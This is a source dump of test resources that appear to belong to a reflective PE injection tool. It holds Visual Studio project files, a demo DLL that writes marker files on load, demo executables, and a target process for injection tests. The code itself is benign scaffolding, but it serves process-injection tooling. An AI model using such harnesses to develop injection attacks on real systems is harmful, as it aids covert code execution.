2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32
16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64
17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64
18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32
19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32
20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64
21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
8 | extern "C" __declspec( dllexport ) void VoidFunc();
9 |
10 |
11 | extern "C" __declspec( dllexport ) void VoidFunc()
12 | {
13 | ofstream myfile;
14 | _mkdir("c:\\ReflectiveLoaderTest");
15 | myfile.open ("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt");
16 | myfile << "Dll Void function successfully called.\n";
17 | myfile.close();
18 | return;
19 | }
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL_RemoteProcess application.
9 |
10 |
11 | DemoDLL_RemoteProcess.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL_RemoteProcess.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL_RemoteProcess.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | using namespace std;
5 |
6 | BOOL APIENTRY DllMain( HMODULE hModule,
7 | DWORD ul_reason_for_call,
8 | LPVOID lpReserved
9 | )
10 | {
11 | ofstream myfile;
12 |
13 | switch (ul_reason_for_call)
14 | {
15 | case DLL_PROCESS_ATTACH:
16 | _mkdir("c:\\ReflectiveLoaderTest");
17 | myfile.open ("c:\\ReflectiveLoaderTest\\DllMain.txt");
18 | myfile << "DllMain successfully called.\n";
19 | myfile.close();
20 | break;
21 | case DLL_THREAD_ATTACH:
22 | case DLL_THREAD_DETACH:
23 | case DLL_PROCESS_DETACH:
24 | break;
25 | }
26 | return TRUE;
27 | }
28 |
29 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 | // TODO: reference additional headers your program requires here
20 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Win32 = Debug|Win32
11 | Debug|x64 = Debug|x64
12 | Release|Win32 = Release|Win32
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32
17 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32
18 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64
19 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64
20 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32
21 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32
22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64
23 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64
24 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32
25 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32
26 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64
27 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64
28 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32
29 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32
30 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64
31 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64
32 | EndGlobalSection
33 | GlobalSection(SolutionProperties) = preSolution
34 | HideSolutionNode = FALSE
35 | EndGlobalSection
36 | EndGlobal
37 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Exe loaded! Printing argc and argv\n\n");
12 |
13 | printf("Argc: %d\n", argc);
14 | printf("ArgvAddress: %d\n", argv);
15 |
16 | for (int i = 0; i < argc; i++)
17 | {
18 | wprintf(L"Argv: %s\n", argv[i]);
19 | }
20 |
21 | printf("Exiting exe\n");
22 |
23 | return 0;
24 | }
25 |
26 |
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}
23 | Win32Proj
24 | DemoExe_MD
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 | true
88 | MultiThreadedDLL
89 |
90 |
91 | Console
92 | true
93 |
94 |
95 |
96 |
97 | Use
98 | Level3
99 | Disabled
100 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
101 | true
102 | MultiThreadedDLL
103 |
104 |
105 | Console
106 | true
107 |
108 |
109 |
110 |
111 | Level3
112 | Use
113 | MaxSpeed
114 | true
115 | true
116 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
117 | true
118 |
119 |
120 | Console
121 | true
122 | true
123 | true
124 |
125 |
126 |
127 |
128 | Level3
129 | Use
130 | MaxSpeed
131 | true
132 | true
133 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
134 | true
135 |
136 |
137 | Console
138 | true
139 | true
140 | true
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 | Create
154 | Create
155 | Create
156 | Create
157 |
158 |
159 |
160 |
161 |
162 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MD Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MD application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MD application.
9 |
10 |
11 | DemoExe_MD.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MD.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MD.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MD.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Exe loaded! Printing argc and argv\n\n");
12 |
13 | printf("Argc: %d\n", argc);
14 | printf("ArgvAddress: %d\n", argv);
15 |
16 | for (int i = 0; i < argc; i++)
17 | {
18 | wprintf(L"Argv: %s\n", argv[i]);
19 | }
20 |
21 | printf("Exiting exe\n");
22 |
23 | return 0;
24 | }
25 |
26 |
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}
23 | Win32Proj
24 | DemoExe_MDd
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 | true
88 |
89 |
90 | Console
91 | true
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
100 | true
101 |
102 |
103 | Console
104 | true
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
115 | true
116 |
117 |
118 | Console
119 | true
120 | true
121 | true
122 |
123 |
124 |
125 |
126 | Level3
127 | Use
128 | MaxSpeed
129 | true
130 | true
131 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 | Create
152 | Create
153 | Create
154 | Create
155 |
156 |
157 |
158 |
159 |
160 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MDd application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MDd application.
9 |
10 |
11 | DemoExe_MDd.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MDd.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MDd.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MDd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32
15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp:
--------------------------------------------------------------------------------
1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Press enter to close.\n");
12 | getchar();
13 |
14 | return 0;
15 | }
16 |
17 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}
15 | Win32Proj
16 | ExeToInjectInTo
17 |
18 |
19 |
20 | Application
21 | true
22 | v110
23 | Unicode
24 |
25 |
26 | Application
27 | false
28 | v110
29 | true
30 | Unicode
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 | true
44 |
45 |
46 | false
47 |
48 |
49 |
50 | Use
51 | Level3
52 | Disabled
53 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
54 | true
55 |
56 |
57 | Console
58 | true
59 |
60 |
61 |
62 |
63 | Level3
64 | Use
65 | MaxSpeed
66 | true
67 | true
68 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
69 | true
70 |
71 |
72 | Console
73 | true
74 | true
75 | true
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 | Create
89 | Create
90 |
91 |
92 |
93 |
94 |
95 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ExeToInjectInTo application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ExeToInjectInTo application.
9 |
10 |
11 | ExeToInjectInTo.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ExeToInjectInTo.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ExeToInjectInTo.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ExeToInjectInTo.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
